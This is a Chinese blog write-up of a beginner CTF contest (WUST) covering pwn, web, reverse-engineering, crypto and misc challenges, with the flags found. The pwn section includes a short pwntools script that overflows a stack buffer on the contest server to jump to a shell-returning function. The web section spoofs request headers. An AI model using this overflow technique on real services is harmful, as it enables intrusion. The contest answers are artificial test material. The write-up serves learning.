WUST 五一萌新向CTF writup

最新推荐文章于 2021-09-05 21:57:16 发布
最新推荐文章于 2021-09-05 21:57:16 发布
阅读量460 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42436176/article/details/105892549
版权

文章目录

前言

萌新场, 但是还是有不少可以学到的

PWN

just_run

简单的签到题, 将题目拖进IDA后发现直接给了shell, 直接cat即可.
flag{294dbf32-54ea-4c2f-a0d3-e3221df75913}
在这里插入图片描述

在这里插入图片描述

2048

将题目拖入IDA进行分析, 发现可溢出位置read
在这里插入图片描述
懒得静态分析, 直接使用gdb构造字符串看看溢出成什么样子吧, 使用pattern_create 200构造出200长度的字符串

AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

直接进行运行. 等等等怎么直接过了? 算了过了就过了, 直接拿到flagflag{a1cbd38a-d468-440d-b623-6214aad97f68}
在这里插入图片描述

joke

话不多说直接上IDA进行分析, 虽然IDA分析出错, 但是可以发现唯一注入点只有input, 后面不再有输入的可能
在这里插入图片描述

随后在函数列表中发现mistake函数, 返回了shell, 很明显, 要使EIP/RIP指向mistake.

既然是溢出, 那为什么不直接试试, 直接上gdb神器, 构造200长度的字符串, 输入执行, 程序随后报错, 看到在ret命令下停止

百度查询ret, 描述为, 可理解为pop IP

RET是子程序的返回指令, 执行本指令时:sp增加一个内存单元, 栈顶数据出栈赋值给ip寄存器
(SP)->PCH,然后(SP)-1->SP
(SP)->PCL,然后(SP)-1->SP
最终使sp-2

大意为相当于命令pop IP, 我们便可以通过修改栈顶使得pop出mistake的地址完成跳转
首先查看寄存器ESP的值
在这里插入图片描述

检查其偏移量pattern_offset AcAA2AAHAAdAA3AAIAAeAA456
在这里插入图片描述
查看mistake函数地址disas mistake0x000000000040089c
在这里插入图片描述

from pwn import *
conn = remote('121.41.113.245', 10001)
conn.sendline('A' * 56 + p64(0x000000000040089c))
conn.interactive()
conn.close()

在这里插入图片描述得到flagflag{3ae15963-fd5c-464c-ba30-299cc5a4e481}

Web

签到题

根据题目显示一步步构造表单即可
源自百度构造Refererhttps://www.baidu.com
本地访问构造Client-ip127.0.0.1
得到flag为flag{welc0me_t0_WEB_s3cur1ty}
在这里插入图片描述

RE

ez_py

下载下来为pyc文件, 直接丢去pyc在线反编译
在这里插入图片描述

def encode(message):
    flag = ''
    for i in message:
        x = ord(i) ^ 16
        x = x + 5
        flag += chr(x)

    return flag


message = 'qwLrfD;`JU`~"JY>pOJ_;J,OOJZypJw<ypJZqJ.;Oph'
print(encode(message))

>>> flag{Y0u_Jus7_N3ed_T0_Add_One_l1ne_Of_C0de}

baby_re

这题虽然是基础, 但是君IDA本当下脚, 还是折腾了一段时间才出来
查看主逻辑, 发现最重要的应该是check函数
在这里插入图片描述

进入check后, 发现是对输入的内容进行了变化, 随后和储存的flag进行比较, 说明flag应该为加密后的字符串, 进入flag进行检查
在这里插入图片描述

在这里插入图片描述
可知flag为int[]类型, 其中int类型在计算机中为4字节, 且为小端储存, 尝试构造固定头flag{

data = "flag{"

for i in data:
   a = 8 * ord(i)
   a += 16
   a ^= 0x10
   print(hex(a), end=" ")
>>> 0x350 0x360 0x308 0x358 0x3f8

便从大到小组合

hexs = [0x350, 0x360, 0x308, 0x358, 0x3f8, 0x2b0, 0x328, 0x318, 0x188, 0x1a8,
        0x318, 0x2b8, 0x180, 0x398, 0x398, 0x398, 0x398, 0x398, 0x398, 0x398,
        0x398, 0x398, 0x318, 0x2b8, 0x348, 0x368, 0x380, 0x360, 0x328, 0x3e8]

for i in hexs:
    a = i ^ 0x10
    a -= 16
    a /= 8
    print(chr(int(a)), end="")
>>> flag{Re_15_S0ooooooooo_Simple}

CRYPTO

base64

下载下来为一个压缩包, 其中一个有密码, 另一个为一个base64编码过的图片, 使用工具解码base64
站长工具
在这里插入图片描述

得到密码WAIS, 以这个为密码解密压缩包得到字符串ZmxhZ3sxc19teV9wNHNzd29yZF90MG9fNWltcGxlXz99
拉去base64一下得到flag{1s_my_p4ssword_t0o_5imple_?}

兔老大

打开后得到一个图片和一个txt, 发现包含内容U2FsdGVkX19+EusfRjwm+09ipD4H/UegyaD8uh4kzJ9PtFqfyJqmrc3zYKliJ1WpfWjmGmzSl5s=
看到后面=首先怀疑Base64, 拿去解一下
在这里插入图片描述
解码为乱码, 但是有部分出来了, 百度查询固定地方得到为rabbit加密, 但是缺少密钥, 根据文本--rab...忘记英语怎么拼了猜测密钥为rabbit, 解码后得到MZWGCZ33KJQWEYRRORPTC427OY2HE6K7MN2XIND5拿去base32一下, 成功
flag{Rabb1t_1s_v4ry_cut4}

easy_caesar

密文内容]p{k]|X6TmI3MWL6f4<J\Zv}[3QkP6Qkfo<GP[Er][LoQ3T@
明显扩展了ascii表, 查看最高和最低分别为0}, 构造字母表0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_``abcdefghijklmnopqrstuvwxyz{|}
在解密网站ROT Cipher可以直接拿到结果
在这里插入图片描述

对结果base64解码得到flag{1t's_Fak3_Ca3sar_C1pher}

MISC

Where_am_I

在这里插入图片描述 可知第一个颜色RGB为40, 41, 21, 第二个颜色RGB为74, 2, 40
在这里插入图片描述

带入坐标
在这里插入图片描述
在这里插入图片描述

可以定位到自由女神像, 那么flag为flag{statue_of_liberty}
顺带一提, 我之前还试了
flag{statue_of_liberty_national_mountain}
flag{statue_of_liberty_park}
flag{fort_wood}
flag{liberty_island}
flag{new_york}

因为statue_of_liberty不缩放大不显示, 真是日了Ash3n_On3

古老的计算机

本题给了一张图片, 用winhex打开, 发现最后附加了大量内容
在这里插入图片描述

有4和2两种组合, 将此数据导出进行解析

data = "\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20\x2E\x2E\x20\x2E\x2E\x2E\x2E\x20"

count = 0
for i in data:
   if i == '\x20':
       print(0 if count == 2 else 1, end="")
       count = 0
   else:
       count += 1

最后二进制转字符串

在这里插入图片描述
flag{1t_1s_s0_4asy}

double_flag

本题提供一个压缩文件, 但是打开压缩文件损坏, 使用winhex打开, 发现缺少文件头, 补上504B0304
成功解压文件, 仔细看发现第二张图片有乱码, 使用winhex查看
随便扫了一眼, 发现在1024处有一个flag, 而源文件没有
在这里插入图片描述

使用Beyound_compaire对比发现部分字节不同
在这里插入图片描述
在这里插入图片描述

将不同的地方进行组合得到flag. 太伤眼了就不整了…

彩蛋

终极彩蛋

专业签到, 换行符和光标出卖了你
在这里插入图片描述
全选改色即可看到
在这里插入图片描述

Simon菌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wust计算机学院ftp站点使用图解
12-04
这是武汉科技大学 计算机学院的 一个 ftp站点 里面 有大量的 学习资源 电影 讲座 等
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1458
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更一波杂项的题解。
“百度杯”CTF比赛 十一月场 - 贝丝家族
Darenfy 随记
01-07 630
题目内容: 我喜欢贝丝,但是贝丝的表妹喜欢我 还给了我一封情诗 MZWGCZ33MVZGQZLJL5STQOJTGRPWK4SVJ56Q==== 解题思路 由于结尾有四个 = ,所以不再可能是 Base64,提到了表妹,所以猜测是 Base32 掏工具
CTFweb篇——签到题
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
几道CTF题的writeup
蚁景网安学院
08-27 2304
0x01 PlainR2B这是一道比较简单的PWN题目,首先拖到IDA里简单看了一下程序,如图发现在读取,没有栈保护,所以,在read0x34时,可能替换game返回址址,先通过writ...
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3371
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合题 system SQL注入2 综合题2 注入实战1 密码重置2 ...
武科大OJ WUST OnlineJudge
02-27
OJ基础部分代码 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 ...
python 登录wust wifi6
最新发布
09-12
python 登录wust wifi6
2019级wust单片机课设
05-14
1. 目的: 采用 MSP430 单片机为控制器件,发光二极管 LED 用于交通信号的输出,此交通信号 灯共有 12 盏灯,分 3 盏灯一组分别控制四个路口。 2. 功能:(1)设计一个交通信号灯控制器,由两条主干道汇合成十字路口...
Tolerancing Limits and Fit WUST.srt
10-18
Tolerancing Limits and Fit WUST.srt
WUST_Supplicant_For_Linux锐捷客户端linux版
04-29
linux版本的锐捷客户端,可直接解压安装,方便快捷,不需要安装其他
wust数值计算实验报告
12-30
武科大的数值计算实验报告(里面有小结,代码,截图)看你心情啦,但是也不能全用吧?你说对不啦~
组成原理重点wust
01-06
武汉科技大学计算机学院 计算机组成原理 重点 不止一点点全面
wust编译原理熊老师实验二,语法分析
05-10
wust编译原理熊老师实验二,语法分析
传动系的检测与诊断--WUST.pdf
07-30
传动系的检测与诊断--WUST.pdf
2019上海市大学生网络安全大赛 部分re 部分pwn
qq_41071646的博客
11-06 713
看萝卜师傅的博客 感觉题目很有趣 然后决定刷一波 萝卜师傅博客链接 http://radishes.top/2019/11/03/2019-11-03-2019shanghai/ RE 函数逻辑非常简单 一开始 check1 把我迷惑了 让我认为 限制字符只有 a-f 后来输入过程中 发现了 不止是 a-f 。。。 然后 发现 输入字符0也可以,,原来是 无符号,,, 智障了...
COCI 2018/2019 Strah(极大子矩形思想)
Freopen的博客
12-02 985
Everyone is afraid of something. Someone is afraid of darkness, someone is afraid of heights, someone is afraid of Vinnie Jones (all of us are afraid of Vinnie Jones), someone is afraid of singing be...
将图片转换为Base64编码字符串、解析Base64编码字符串后生成图片
热门推荐
qq_42449963的博客
09-05 11万+
代码 public class Test { public static void main(String[] args) { // 测试1:将图片转换成base64编码字符串 String code = imgToCode("C:\\Users\\mingming\\Pictures\\Screenshots\\1.png"); System.out.println("生成的base64编码字符串是:" + code); // 测试
高校战“疫”网络安全分享赛Re:天津垓WP
辰星的博客
03-16 394
复现题 我下载的时候这个题缺了个dll,补上后运行下程序,观察。 需要输入授权字符串。拖入IDA查看,查看字符串,发现有限制调试工具的代码,解除。 找到第一个输入点。需要输入符号位运算的合法输入,写个脚本破解,如下: str = [0x52, 0x69, 0x73, 0x69, 0x6e, 0x67, 0x5f, 0x48, 0x6f, 0x70, 0x70, 0x65, 0x72, ...
如何使用restTemplate向网址https://ontoweb.wust.edu.cn/web-etl/webetl/funso/shortTrans?trans=9w_crb_save_v2&type=json上传一个对象
07-16
你可以按照以下代码示例使用RestTemplate向指定网址上传一个对象: ```java import org.springframework.http.HttpHeaders; import org.springframework.http.HttpEntity; import org.springframework....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值